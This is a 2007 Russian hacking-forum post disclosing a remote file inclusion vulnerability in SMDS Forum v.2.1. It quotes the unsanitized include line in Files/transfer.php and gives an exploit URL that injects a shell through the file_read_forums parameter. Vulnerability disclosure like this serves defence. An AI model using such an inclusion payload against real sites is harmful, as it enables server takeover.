ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу SMDS Forum v.2.1 remote file inclusion
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SMDS Forum v.2.1 remote file inclusion
  #1  
Старый 01.09.2007, 17:58
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию SMDS Forum v.2.1 remote file inclusion
Только что нашел удаленный инклуд в скриптах форума. Посмотреть описание форума и скачать сам движок можно здесь. Хотя форум и очень старый, но погуглив по теме:
Код:
SMDS Forum v.2.1 php inclusion
ничего не нашел.
Уязвимость присутствует в скрипте Files/transfer.php. В строке 13 код:
PHP код:
include $file_read_forums
позволяет провести атаку на форум:
Код:
http://www.example.com/[FORUM_DIR]/Files/transfer.php?file_read_forums=[shell]
Последний раз редактировалось The_HuliGun; 01.09.2007 в 18:16..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемы с Записью Cd-R Nova Аппаратное обеспечение 17 14.03.2009 17:59
Подскажите Chrek625 Болталка 6 11.01.2007 21:46
Нужна консультация (Intranet Chat) ty3ik Чаты 3 30.04.2006 19:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ